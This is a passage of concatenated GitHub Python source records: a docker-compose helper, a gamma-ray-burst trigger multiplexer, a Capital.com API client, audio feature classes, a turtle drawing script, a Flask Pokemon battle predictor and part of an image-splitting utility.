module:\n\n - run `pip install catcher[compose]`. It will installs all requirements, if they were not installed.\n\n \"\"\"\n def __init__(self, resources_dir) -> None:\n super().__init__()\n self._resources = resources_dir\n self._cmd = None\n self._options = {'--detach': True,\n 'SERVICE': \"\",\n '--no-deps': False,\n '--abort-on-container-exit': False,\n '--no-recreate': True,\n '--remove-orphans': False,\n '--always-recreate-deps': False,\n '--force-recreate': False,\n '--build': False,\n '--no-build': False,\n '--no-color': False,\n '--rmi': 'none',\n '--volumes': \"\",\n '--follow': False,\n '--timestamps': False,\n '--scale': {}\n }\n\n def up(self):\n \"\"\"\n Will run `docker-compose up -d` only in case docker-compose is installed locally\n and there is a docker-compose.yml file in resources directory\n \"\"\"\n compose = self.find_compose_file()\n if compose and is_package_installed('compose'):\n from compose.cli.main import TopLevelCommand, project_from_options\n info('Starting docker-compose. Please wait.')\n self._options['-f'] = join(self._resources, compose),\n self._cmd = TopLevelCommand(project_from_options(self._resources, self._options))\n self._cmd.up(self._options)\n\n def down(self):\n if self._cmd:\n self._cmd.down(self._options)\n\n def find_compose_file(self) -> Union[str, None]:\n \"\"\" find a docker compose file inside a resources directory \"\"\"\n if self._resources is None:\n return None\n files = [f for f in listdir(self._resources) if self._is_compose(f)]\n if files:\n return files[0]\n return None\n\n def _is_compose(self, file: str) -> bool:\n # use only default docker-compose.yml for now, will change it in future if needed.\n return isfile(join(self._resources, file)) and file == 'docker-compose.yml'\n","repo_name":"brunojensen/catcher","sub_path":"catcher/modules/compose.py","file_name":"compose.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"33482995578","text":"import warnings\nimport logging\nfrom math import sqrt\n\nimport numpy as np\n\nKDETS = (\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"a\", \"b\")\nKRANGES = (\"0\", \"1\", \"2\")\n\n\ndef get_keys(ns=KDETS, rs=KRANGES):\n \"\"\"\n build lists like ['n1_r0', 'n3_r0']\n :param ns: sequence representing dets\n :param rs: sequence representing ranges\n :return: list of strings\n \"\"\"\n out = [\"n\" + str(i) + \"_r\" + j for i in ns for j in rs]\n return out\n\n\ndef filter_keys(ls, ns, rs=None):\n \"\"\"\n :param ls: list of string keys\n :param ns: detectors to keep\n :param rs: ranges to keep\n :return: filtered list of strings\n \"\"\"\n if rs is None:\n rs = [\"0\", \"1\", \"2\"]\n index_labels = set([i[1] for i in ls])\n range_labels = set([i[-1] for i in ls])\n\n out_index = index_labels.intersection(ns)\n out_range = range_labels.intersection(rs)\n return sorted(get_keys(out_index, out_range))\n\n\ndef trigger_mux(\n observations_df,\n trig,\n thresholds,\n stride,\n t_start=0.0,\n max_consecutive_zeros=10,\n **trig_params,\n):\n def reset_trigger(detector_key):\n trigs[detector_key] = trig(**trig_params)\n global_maximums[detector_key] = 0\n time_offsets[detector_key] = 0\n return True\n\n ndet = len(thresholds)\n\n mets_arr = observations_df[\"MET\"].to_numpy()\n saa_arr = observations_df[\"SAA\"].to_numpy()\n counts_arr = observations_df[get_keys()].to_numpy()\n det_keys = [(i, k) for i, k in enumerate(get_keys()) if np.isfinite(thresholds[i])]\n det_indeces, 
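# get_keys above is a Cartesian product over detector and range labels, e.g.
# get_keys(('1', '3'), ('0',)) -> ['n1_r0', 'n3_r0'] as its docstring says.
# The same labels via itertools, as a cross-check sketch:
from itertools import product
assert get_keys(('1', '3'), ('0',)) == ['n%s_r%s' % dr for dr in product(('1', '3'), ('0',))]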
det_names = zip(*det_keys)\n\n consecutive_zeros = np.array([0 for _ in range(ndet)])\n global_maximums = np.array([0.0 for _ in range(ndet)])\n time_offsets = np.array([0 for _ in range(ndet)])\n trigs = [trig(**trig_params) for _ in range(ndet)]\n trig_registry = []\n\n nrows = len(mets_arr)\n t = int(t_start * nrows)\n while t < nrows:\n print(end=\"\\r%6.2f %%\" % (t / (nrows - 1) * 100))\n\n # deals with SAA passages\n if saa_arr[t]:\n for n, _ in det_keys:\n reset_trigger(n)\n consecutive_zeros[n] = 0\n\n try:\n next_out, *_ = np.where(saa_arr[t:] == 0)[0]\n except ValueError:\n # deals with the possibility of observations ending in saa\n if not np.all(saa_arr[t:]):\n raise\n t = nrows\n else:\n t += next_out\n continue\n\n # deals with occasionally detectors turning off at same time\n elif not np.any(counts_arr[t]):\n for n, _ in det_keys:\n warnings.warn(\n f\"All detectors seems to be off. \"\n f\"Resetting all triggers. \"\n f\"MET: {mets_arr[t]}\"\n )\n reset_trigger(n)\n consecutive_zeros[n] = 0\n try:\n next_out, *_ = np.where(np.all(counts_arr[t:], axis=1))[0]\n except ValueError:\n # deals with the possibility of signal never coming up again\n if not np.all(counts_arr[t:]):\n raise\n t = nrows\n else:\n t += next_out\n continue\n\n for n, det_key in zip(det_indeces, det_names):\n x_t = counts_arr[t, n]\n if x_t <= 0:\n consecutive_zeros[n] += 1\n else:\n consecutive_zeros[n] = 0\n\n if consecutive_zeros[n] > max_consecutive_zeros:\n # data may contains segments in which the counts of some detector\n # is constantly zero because the detector is turned off.\n # this happens most often with sun-facing detectors.\n # if we pass too much zero data to the trigger, they will\n # pollute the background estimate, possibly causing\n # false detection. when we detect this, we restart the trigger.\n reset_trigger(n)\n warnings.warn(\n f\"Found a bad data segment for detector {det_key}. \"\n f\"Resetting the corresponding trigger. \"\n f\"MET: {mets_arr[t]}\"\n )\n continue\n\n try:\n global_max, time_offset = trigs[n].step(x_t)\n except ValueError:\n raise ValueError(\n f\"Corrupted background estimate over {det_key}. 
\"\n f\"Resetting this trigger.\"\n f\"MET: {mets_arr[t]}\"\n )\n global_maximums[n] = global_max\n time_offsets[n] = time_offset\n\n # trigger condition.\n if len(np.unique(np.floor((np.argwhere(global_maximums > thresholds).T + 1) / 3))) > 1:\n print(\", found a trigger.\")\n logging.info(\"\\n--------\")\n logging.info(\"New trigger [key: {:3d}]\".format(len(trig_registry)))\n trig_met = mets_arr[t]\n logging.info(\"MET: {}.\".format(trig_met))\n logging.info(\"{:.1f}% done!\".format(100 * t / nrows))\n logging.info(\"Iteration number: {}\".format(t))\n trig_entry = [len(trig_registry), trig_met]\n for i, (key, to, gm) in enumerate(\n zip(get_keys(), time_offsets, global_maximums)\n ):\n if gm > thresholds[i]:\n logging.info(\n \"det_name: {}, time-offset: {:3d}, significance {:.2f}\".format(\n key, -to, gm\n )\n )\n trig_entry.append((key, to, sqrt(2 * gm)))\n trig_registry.append(tuple(trig_entry))\n for n, _ in det_keys:\n reset_trigger(n)\n consecutive_zeros[n] = 0\n t += stride\n else:\n t += 1\n return trig_registry\n","repo_name":"peppedilillo/grb-trigger-algorithms","sub_path":"grb-trigger-algorithms/real_data/trigger_multiplexer.py","file_name":"trigger_multiplexer.py","file_ext":"py","file_size_in_byte":5900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73548773859","text":"import logging\nimport sys\nimport pydevd\n\n__author__ = 'ehongka'\n\n\ndef main():\n \"\"\"main function\"\"\"\n print(\"start\")\n logging.basicConfig(level=logging.DEBUG)\n logging.info(\"logging is working\")\n print(\"end\")\n\n\nif __name__ == \"__main__\":\n print(\"111\")\n pydevd.settrace('142.133.110.134', port=51234)\n main()\n","repo_name":"hongkailiu/test-python","sub_path":"main/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7613709431","text":"# -*- coding: utf-8 -*-\n\"\"\"Capital.com API wrapper for capitals REST-V10 API.\"\"\"\n\nimport json\nimport requests\nimport logging\nfrom .exceptions import V10Error\n\nITER_LINES_CHUNKSIZE = 60\n\nTRADING_ENVIRONMENTS = {\n \"demo\": {\n \"stream\": 'wss://api-streaming-capital.backend-capital.com/connect',\n \"api\": 'https://demo-api-capital.backend-capital.com/'\n },\n \"live\": {\n \"stream\": 'wss://api-streaming-capital.backend-capital.com/connect',\n \"api\": 'https://api-capital.backend-capital.com'\n }\n}\n\nDEFAULT_HEADERS = {\n \"Accept-Encoding\": \"gzip, deflate\"\n}\n\nlogger = logging.getLogger(__name__)\n\n\nclass API(object):\n r\"\"\"API - class to handle APIRequests objects to access API endpoints.\n \"\"\"\n\n def __init__(self, apikey, environment=\"demo\",\n headers=None, request_params=None):\n \"\"\"Instantiate an instance of CapitalcomPy's API wrapper.\n\n Parameters\n ----------\n\n environment : string\n Provide the environment for capital.com's REST api. Valid values:\n 'demo' or 'live'. Default: 'demo'.\n\n headers : dict (optional)\n Provide request headers to be set for a request.\n For all requests this should be:\n\n X-SECURITY-TOKEN : string\n Provide a valid account token\n\n CST : string\n Provide a valid session authorization token\n\n Note X-SECURITY-TOKEN and CST are provided by the Capital.com API based on the\n call to the session endpoint. 
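# Reading the trigger condition above: argwhere collects the flat indices of
# detector/range channels whose running maximum exceeds the threshold,
# floor((idx + 1) / 3) bins them in groups of three (the r0/r1/r2 ranges of
# one detector), and the trigger fires only when more than one bin is hit.
# Note the +1 shifts the bins by one slot relative to a plain idx // 3
# grouping; if a straight per-detector grouping was the intent (an
# assumption, not a fix), an explicit version would be:
import numpy as np

def distinct_detectors_over(global_maximums, thresholds):
    over = np.argwhere(np.asarray(global_maximums) > np.asarray(thresholds)).ravel()
    return len(np.unique(over // 3))  # count of distinct triggered detectors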
These fields are added to the headers of the API object\n after successfull call to the getEncryptionKey and session calls.\n\n \"\"\"\n logger.info(\"setting up API-client for environment %s\", environment)\n try:\n TRADING_ENVIRONMENTS[environment]\n\n except KeyError as err: # noqa F841\n logger.error(\"unkown environment %s\", environment)\n raise KeyError(\"Unknown environment: {}\".format(environment))\n\n else:\n self.environment = environment\n\n self.apikey = apikey\n self.client = requests.Session()\n self.client.stream = False\n self._request_params = request_params if request_params else {}\n\n # personal token authentication\n if self.apikey:\n self.client.headers['X-CAP-API-KEY'] = self.apikey\n self.client.headers['Content-Type'] = 'application/json'\n\n self.client.headers.update(DEFAULT_HEADERS)\n\n if headers:\n self.client.headers.update(headers)\n logger.info(\"applying headers %s\", \",\".join(headers.keys()))\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n\n def close(self):\n \"\"\"close.\n\n explicit close of the session.\n \"\"\"\n self.client.close()\n\n @property\n def request_params(self):\n \"\"\"request_params property.\"\"\"\n return self._request_params\n\n def __request(self, method, url, request_args, headers=None, stream=False):\n \"\"\"__request.\n\n make the actual request. This method is called by the\n request method in case of 'regular' API-calls. Or indirectly by\n the__stream_request method if it concerns a 'streaming' call.\n \"\"\"\n func = getattr(self.client, method)\n headers = headers if headers else {}\n response = None\n try:\n logger.info(\"performing request %s\", url)\n response = func(url, stream=stream, headers=headers,\n **request_args)\n except requests.RequestException as err:\n logger.error(\"request %s failed [%s]\", url, err)\n raise err\n\n # Handle error responses\n if response.status_code >= 400:\n \"\"\" Prices are retrieved using a generator that retrieves the candles.\n Sometimes individual calls yield a response code of 400 with and errorcode.\n We don't want the calls to stop and just continue to get the next prices. \n This is achieved by setting the status code to 200.\n \"\"\"\n if response.content.decode('utf-8') == '{\"errorCode\":\"error.prices.not-found\"}':\n response.status_code = 200\n return response\n\n else:\n logger.error(\"request %s failed [%d,%s]\",\n url,\n response.status_code,\n response.content.decode('utf-8'))\n raise V10Error(response.status_code,\n response.content.decode('utf-8'))\n return response\n\n def __stream_request(self, method, url, request_args, headers=None):\n \"\"\"__stream_request.\n\n make a 'stream' request. 
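# A note on the error path in __request above: a 400 response whose body is
# {"errorCode":"error.prices.not-found"} has its status_code rewritten to
# 200 so that price-history generators skip empty candle windows instead of
# aborting. Callers therefore receive an "OK" response that still carries
# the error code in its body; a defensive caller-side check (sketch only):
#
#     if isinstance(content, dict) and content.get('errorCode') == 'error.prices.not-found':
#         continue  # no candles in this window; ask for the next one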
This method is called by\n the 'request' method after it has determined which\n call applies: regular or streaming.\n \"\"\"\n headers = headers if headers else {}\n response = self.__request(method, url, request_args,\n headers=headers, stream=True)\n lines = response.iter_lines(ITER_LINES_CHUNKSIZE)\n for line in lines:\n if line:\n data = json.loads(line.decode(\"utf-8\"))\n yield data\n\n def request(self, endpoint):\n \"\"\"Perform a request for the APIRequest instance 'endpoint'.\n\n Parameters\n ----------\n endpoint : APIRequest\n The endpoint parameter contains an instance of an APIRequest\n containing the endpoint, method and optionally other parameters\n or body data.\n\n Raises\n ------\n V10Error in case of HTTP response code >= 400\n \"\"\"\n method = endpoint.method\n method = method.lower()\n params = None\n try:\n params = getattr(endpoint, \"params\")\n except AttributeError:\n # request does not have params\n params = {}\n\n headers = {}\n if hasattr(endpoint, \"HEADERS\"):\n headers = getattr(endpoint, \"HEADERS\")\n\n request_args = {}\n if method == 'get':\n request_args['params'] = params\n elif hasattr(endpoint, \"data\") and endpoint.data:\n request_args['data'] = endpoint.data\n #request_args = json.loads(endpoint.data)\n\n\n # if any parameter for request then merge them\n #request_args.update(self._request_params)\n\n # which API to access ?\n if not (hasattr(endpoint, \"STREAM\") and\n getattr(endpoint, \"STREAM\") is True):\n url = \"{}/{}\".format(\n TRADING_ENVIRONMENTS[self.environment][\"api\"],\n endpoint)\n\n response = self.__request(method, url,\n request_args, headers=headers)\n content = response.content.decode('utf-8')\n content = json.loads(content)\n\n # update endpoint\n endpoint.response = content\n endpoint.status_code = response.status_code\n\n if endpoint.ENDPOINT == \"api/v1/session\" :\n if endpoint.status_code == endpoint.expected_status:\n del self.client.headers['X-CAP-API-KEY']\n self.client.headers['X-SECURITY-TOKEN'] = response.headers['X-SECURITY-TOKEN']\n self.client.headers['CST'] = response.headers['CST']\n\n return content\n\n else:\n url = \"{}/{}\".format(\n TRADING_ENVIRONMENTS[self.environment][\"stream\"],\n endpoint)\n endpoint.response = self.__stream_request(method,\n url,\n request_args,\n headers=headers)\n return endpoint.response\n","repo_name":"3sr3v3r/capitalcom-getdata","sub_path":"capitalcompy/capitalcompy.py","file_name":"capitalcompy.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35339582469","text":"\"\"\" \n This is package contains several algorithms for Tempo Analysis and Beat tracking in Python.\n\n Currently this package contains the functions necessary to estimate the tempo.\n\n \"\"\"\nimport os\nimport scipy as sp\nimport scikits.audiolab as al\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as ml\nfrom matplotlib.ticker import FuncFormatter, FixedLocator, MaxNLocator, MultipleLocator\nimport exceptions\n\n \nclass Signal(object):\n \"\"\"\n This class models a time-varying signal (either real or complex). \n \n The information is stored as a Numpy array.\n \n The following operations are currently supported: loading the data from a file, plotting the data, and playing the data. 
Depending of the array dimension different operations are available.\n \n \"\"\"\n# data = DataClass(test_nd_ndarray, sp.zeros((0,)))\n# fs = DataClass(test_positive, 1)\n \n default_xlabel = \"Time (s)\"\n default_ylabel = \"Signal\"\n\n # Number of time samples. Equivalent to the last dimension of self.data.\t\n @property\n def num_samples(self):\n return self.data.shape[-1]\n\n # Period between adjacent frames in seconds:\n @property\n def period(self):\n return 1.0/self.fs\n\n # Duration in signals\n @property\n def duration(self):\n return self.num_samples*self.period\n \n def __init__(self, data = sp.zeros((0,)), fs=1):\n \"\"\"The signal can be initialized by a numpy uni-dimensional array. \"\"\"\n\n self.data = data\n self.fs = fs\n self.name = \"time signal\"\n \n def plot(self):\n \"Plots the signal using MatPlotLib.\"\n t = sp.linspace(0,(sp.size(self.data)-1.0)/self.fs,sp.size(self.data)) \n ax = plt.plot(t,self.data)\n plt.xlabel(self.default_xlabel)\n plt.ylabel(self.default_ylabel)\n return plt.gca()\n \n def __add__(self, other):\n \"\"\"Add overload\"\"\"\n if(other.fs == self.fs):\n aux = self\n aux.data = self.data+other.data\n return aux\n raise TypeError\n \nclass AudioSignal(Signal):\n\n def __init__(self,data=sp.zeros((0,)),fs=0,filename=\"\",small_footprint=False, \n mix_opt='l'):\n \"\"\" \"\"\"\n super(AudioSignal,self).__init__(data, fs)\n if(filename != \"\"):\n self.load_audiofile(filename, small_footprint, mix_opt)\n\n def load_audiofile(self, filename, small_footprint=False, mix_opt='l'):\n \"\"\"Method description\"\"\"\n snd_file = al.Sndfile(filename,'r')\n aux_file = al.Sndfile(filename,'r')\n name_ext = os.path.basename(filename)\n name = os.path.splitext(name_ext)[0]\n self.encoding = snd_file.format.encoding\n self.file_format = snd_file.format.file_format\n self.filename = name\n self.fs = snd_file.samplerate\n if small_footprint and self.encoding=='pcm16':\n # Reading as flot and converting to int16: avoids bug for stereo files.\n temp_data = snd_file.read_frames(snd_file.nframes)\n temp_data = sp.array(temp_data*32768.0, dtype=sp.int16)\n else:\n temp_data = snd_file.read_frames(snd_file.nframes)\n if temp_data.ndim != 1: # For multi-channel audio, only one channel is loaded\n if mix_opt == 'l':\n temp_data = temp_data[:,0] \n elif mix_opt == 'r':\n temp_data = temp_data[:,1] \n elif mix_opt == 'dm':\n temp_data = (temp_data[:,0] + temp_data[:,1]) / 2.0\n else:\n raise ValueError(\"Invalid channel selection.\")\n self.data = temp_data\n snd_file.close()\n \n def play(self):\n al.play(self.data,self.fs)\n \n\nclass Feature(Signal):\n \"\"\" This class serves as a base class for the storage of features of a Signal.\n \n The features are stored as a 2-D Numpy array inside the data member of this class.\n The data member has a decorator in order to ensure that its type.\n \"\"\"\n # Number of features. Equivalent to the number of lines in self.data.\t\n @property\n def num_features(self):\n if self.data.ndim == 1:\n return 1\n return self.data.shape[0]\n def __init__(self,data=sp.zeros((0,0)), fs=1, signal=None, time_index=None, \n feature_index=None, name=\"unkown\", feat_axis_label = \"Feature number\"):\n \"\"\"Init method. 
Sets the data and sampling rate of the Feature.\"\"\"\n self.data = data\n self.fs = fs\n self.signal = signal\n self.feat_axis_label = feat_axis_label\n self.time_axis_unit = \"Time (s)\"\n self.name = name\n # Creating time index:\n if(time_index is None):\n self.time_index = sp.arange(self.num_samples)/float(self.fs)\n else:\n if(time_index.shape[0]!=self.num_samples):\n raise ValueError(\n \"Time indices must have the same length as self.num_samples.\")\n self.time_index = time_index\n # Creating frequency index:\n if(feature_index is None):\n self.feature_index = sp.arange(self.num_features)\n else:\n# if(feature_index.shape[0]!=self.num_features):\n# raise ValueError(\n# \"Feature indices must have the same length as self.num_feats.\")\n self.feature_index = feature_index\n \n def getFrame(self, frame):\n \"\"\" Returns all feature-values for a given frame. Frame can be an integer type or\n floating point precision. If integer it is assumed to be the frame number, if \n floating point it is assumed to be a time in seconds.\n \"\"\" \n if isinstance(frame, int):\n frame = frame\n elif isinstance(frame, float):\n frame = round(frame/self.fs)\n else:\n raise TypeError(\"Frame must be an integer or a float.\")\n return self.data[:,frame]\n \n def getSignal(self, feature_number):\n \"\"\" Returns a time varying onde-dimensional signal containing a reference to the\n chosen feature number. \n \"\"\"\n if self.data.ndim==1:\n return self\n return Signal(self.data[feature_number, :], self.fs)\n \n def plot(self, transform = None, positive_only = True):\n \"\"\" Plots all features.\"\"\" \n if transform == None: \n transform = lambda x: x\n if(positive_only):\n ind = self.feature_index>=0\n else:\n ind = sp.arange(self.feature_index.shape[0])\n fig = plt.imshow(transform(self.data[ind, :]), origin = 'lower', \n aspect = 'auto', interpolation='nearest')\n ax = plt.gca()\n \n def feat_formatter(x, pos):\n 'The two args are the value and tick position'\n x_int = (round(x))\n x_int = sp.maximum(x_int, 0.0)\n x_int = sp.minimum((self.feature_index[ind]).size-1, x_int)\n x_int = abs(x_int)\n return '%3.2f' % (self.feature_index[ind][x_int]/1000.0)\n \n def time_formatter(x, pos):\n 'The two args are the value and tick position'\n x_int = (round(x))\n x_int = sp.maximum(x_int, 0.0)\n x_int = sp.minimum((self.time_index).size-1, x_int)\n x_int = abs(x_int)\n return '%3.0g' % (round(self.time_index[x_int]*100)/100.0)\n \n feat_format = FuncFormatter(feat_formatter)\n time_format = FuncFormatter(time_formatter)\n ax.yaxis.set_major_formatter(feat_format)\n ax.xaxis.set_major_formatter(time_format)\n# xLoc = MultipleLocator(base=10.0)\n# yLoc = MultipleLocator(base=10.0)\n# xLoc.set_scientific(True)\n# yLoc.set_scientific(True)\n# ax.xaxis.set_major_locator(xLoc)\n# ax.yaxis.set_major_locator(yLoc)\n# xLoc.refresh()\n# yLoc.refresh()\n plt.xlabel(self.time_axis_unit)\n plt.ylabel(self.feat_axis_label)\n \nclass MusicData(object):\n \"\"\" This object contains all data and meta-data related to a music signal.\"\"\"\n\n \nclass Similarity(Feature):\n \"\"\"\n This class models the similarity function of a audio signal. 
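# A note on Feature.getFrame above: converting a time in seconds to a frame
# index requires multiplying by the sampling rate, frame = round(t * fs),
# consistent with time_index = arange(num_samples) / fs; the float branch
# divides instead. Assuming fs is in frames per second, the intended
# conversion would be:
#
#     frame = int(round(frame * self.fs))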
The similarity function\n has a value exhibits the self-similarity of an audio signal for different time\n instants.\n \"\"\"\n default_xlabel = \"BPM\"\n default_ylabel = \"Similarity\"\n def __init__(self, data = None, lag = None, time=0, feat_id=None):\n \"\"\" TODO Documentation\"\"\"\n self.default_xlabel = \"BPM (s)\"\n self.default_ylabel = \"Signal\"\n if data is None: \n data = sp.zeros((0,))\n if lag is None:\n lag = sp.zeros((0,))\n if feat_id is None:\n feat_id = 'unknown'\n self.data = data \n self.lag = lag\n self.time = time\n self.feat_id = [feat_id]\n \n def plot(self, xlabel=default_xlabel, ylabel=default_ylabel):\n \"\"\" Plots the periodicity.\"\"\"\n if self.data.ndim == 1:\n fig = plt.plot(self.bpm, self.data)\n elif self.data.ndim == 2:\n for x in self.data:\n fig = plt.plot(self.bpm, x)\n else:\n raise AttributeError(\"Data must be either a 1-D or 2-D numpy array.\")\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n return fig\n \n def __add__(self, other):\n \"\"\" Adds two similarity vectors.\"\"\"\n if self.data.shape != other.data.shape:\n raise ValueError(\"The similarities must have the same dimension.\")\n if sp.all(self.lag == other.lag) and sp.all(self.time == other.time):\n return Similarity(self.data+other.data, self.lag, self.time)\n else:\n raise ValueError(\"Both Similairties must have the same lag and time stamps.\")\n \n def __iadd__(self, other):\n \"\"\" Adds two similarity vectors.\"\"\"\n if self.data.shape != other.data.shape:\n raise ValueError(\"The similarities must have the same dimension.\")\n if sp.all(self.lag == other.lag) and sp.all(self.time == other.time):\n self.data += other.data\n return self\n else:\n raise ValueError(\"Both Similairties must have the same lag and time stamps.\")\n \n def aggregate_feat(self, other):\n if self.data.shape[:2] != other.data.shape[:2]:\n raise ValueError(\"The similarities must have the same dimension.\")\n if sp.all(self.lag == other.lag) and sp.all(self.time == other.time):\n self.data, temp_data = sp.atleast_3d(self.data, other.data)\n self.data = sp.concatenate((self.data, temp_data), axis=2)\n self.feat_id += other.feat_id\n else:\n raise ValueError(\"Both Similairties must have the same lag and time stamps.\") \n\n @property\n def bpm(self):\n \"\"\"Get the bpm for each similarity element.\"\"\"\n return 60.0/self.lag\n \n def getFeatSim(self, ind):\n if self.data.ndim == 3:\n return Similarity(self.data[:,:,ind], self.lag, self.time)\n else:\n return self\n \n @property\n def num_features(self):\n if self.data.ndim == 3:\n return self.data.shape[-1]\n return 1\n \n @property\n def period(self):\n return self.lag[1] - self.lag[0]\n\nif __name__ == \"__main__\":\n pass","repo_name":"lonnes/RhythmicAnalysis","sub_path":"ra/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":11500,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"22468653477","text":"import turtle\nsonic1=turtle.Pen()\nsonic2=turtle.Pen()\nsonic3=turtle.Pen()\nsonic4=turtle.Pen()\ndef fork1():\n sonic1.fd(100)\n sonic1.left(90)\n sonic1.fd(100)\n sonic1.right(90)\n sonic1.fd(50)\ndef fork2():\n sonic2.fd(100)\n sonic2.fd(10)\n sonic2.left(90)\n sonic2.fd(30)\n sonic2.right(90)\n sonic2.fd(45)\ndef fork3():\n sonic3.fd(100)\n sonic3.right(90)\n sonic3.fd(100)\n sonic3.left(90)\n sonic3.fd(50)\ndef fork4():\n sonic4.fd(100)\n sonic4.fd(10)\n sonic4.right(90)\n sonic4.fd(30)\n sonic4.left(90)\n sonic4.fd(45)\n\n \ndef pitchfork():\n fork1()\n fork2()\n fork3()\n 
fork4()\n","repo_name":"u-lee-hsu/Program__for_test","sub_path":"Python for kids/pitchfork.py","file_name":"pitchfork.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28729160417","text":"# ========================================================================================================\n# Pokemon Battle\n# ========================================================================================================\nfrom flask import Flask, render_template, request, redirect, url_for, jsonify, send_from_directory, abort\nimport requests\nimport joblib\nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport os\nimport random\n\napp = Flask(__name__, static_url_path='')\n\n@app.route('/')\ndef welcome():\n return render_template('welcome.html')\n\n@app.route('/hasil', methods = ['GET', 'POST'])\ndef hasil():\n df = pd.read_csv('pokemon.csv', index_col=0)\n \n pokemon1 = request.form['nama1']\n pokemon2 = request.form['nama2']\n\n if pokemon1.lower().title() in df['Name'].values:\n if pokemon2.lower().title() in df['Name'].values:\n feature = []\n dfPoke1 = df[df['Name'] == pokemon1.lower().title()]\n dfPoke2 = df[df['Name'] == pokemon2.lower().title()]\n\n feature.append(dfPoke1['HP'].values[0])\n feature.append(dfPoke2['HP'].values[0])\n feature.append(dfPoke1['Attack'].values[0])\n feature.append(dfPoke2['Attack'].values[0])\n feature.append(dfPoke1['Defense'].values[0])\n feature.append(dfPoke2['Defense'].values[0])\n feature.append(dfPoke1['Sp. Atk'].values[0])\n feature.append(dfPoke2['Sp. Atk'].values[0])\n feature.append(dfPoke1['Sp. Def'].values[0])\n feature.append(dfPoke2['Sp. Def'].values[0])\n feature.append(dfPoke1['Speed'].values[0])\n feature.append(dfPoke2['Speed'].values[0])\n \n prediction = int(model.predict([feature])[0])\n if prediction == 0:\n prediction = pokemon1\n elif prediction == 1:\n prediction = pokemon2\n probability = round(max(model.predict_proba([feature])[0]) * 100, 2)\n\n url = 'https://pokeapi.co/api/v2/pokemon/'\n dataPokemon1 = requests.get(url+pokemon1)\n dataPokemon2 = requests.get(url+pokemon2)\n\n plt.figure(figsize = (12,3))\n plt.style.use('ggplot')\n\n plt.subplot(161)\n plt.title('HP', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['HP'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['HP'].values[0], color = 'g')\n\n plt.subplot(162)\n plt.title('Attack', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['Attack'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['Attack'].values[0], color = 'g')\n\n plt.subplot(163)\n plt.title('Defense', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['Defense'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['Defense'].values[0], color = 'g')\n\n plt.subplot(164)\n plt.title('Special Attack', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['Sp. Atk'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['Sp. Atk'].values[0], color = 'g')\n\n plt.subplot(165)\n plt.title('Special Defense', size=10)\n plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['Sp. Def'].values[0], color = 'b')\n plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['Sp. 
Def'].values[0], color = 'g')\n\n            plt.subplot(166)\n            plt.title('Speed', size=10)\n            plt.bar(pokemon1,df[df['Name'] == pokemon1.lower().title()]['Speed'].values[0], color = 'b')\n            plt.bar(pokemon2,df[df['Name'] == pokemon2.lower().title()]['Speed'].values[0], color = 'g')\n\n            xy = random.randint(10000, 9999999)\n            listplot = os.listdir('./storage')\n            aa = str(len(listplot) + 1) + '_' + str(xy) + '.jpg'\n\n            # matplotlib expects the lowercase keyword ``transparent``\n            plt.savefig('storage/%s' % aa, transparent=True)\n\n            return render_template('hasil.html', dataPokemon1 = dataPokemon1, dataPokemon2 = dataPokemon2, prediction = prediction, proba = probability, zz=aa)\n        else:\n            return render_template('error.html')\n    else:\n        return render_template('error.html')\n    \n@app.route('/plotku/<yy>') \ndef plotku(yy):\n    return send_from_directory('storage', yy)\n\n@app.errorhandler(404)\ndef notFound(error): \n    return render_template('error.html'), 404\n\nif __name__ == '__main__':\n    model = joblib.load('ML.joblib')\n    app.run(debug = True)","repo_name":"albert-rian/Pokemon_Battle","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71673751140","text":"import glob\nimport os\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\n\ndef split_for_slicling(image: np.array, row_number: int = 9, col_number: int = 9) -> list:\n    r\"\"\" Use the simple numpy slicing function.\n\n    Args:\n        image (np.ndarray): Image array as read by OpenCV.\n        row_number (int): Split along the width of the image. (Default: 9).\n        col_number (int): Split along the height of the image. (Default: 9).\n\n    Shape:\n        image: :math:`(N, *)` where :math:`*` means, any number of additional dimensions\n\n    Returns:\n        Split an array into multiple sub-arrays.\n    \"\"\"\n    __constant__ = [\"row_number\", \"col_number\"]\n    row_number: int\n    col_number: int\n\n    # Cut picture vertically, get a lot of horizontal strips\n    block_row = np.array_split(image, row_number, axis=0)\n    image_blocks = []\n    for block in block_row:\n        # Horizontal direction cutting, get a lot of image blocks\n        block_col = np.array_split(block, col_number, axis=1)\n        image_blocks += 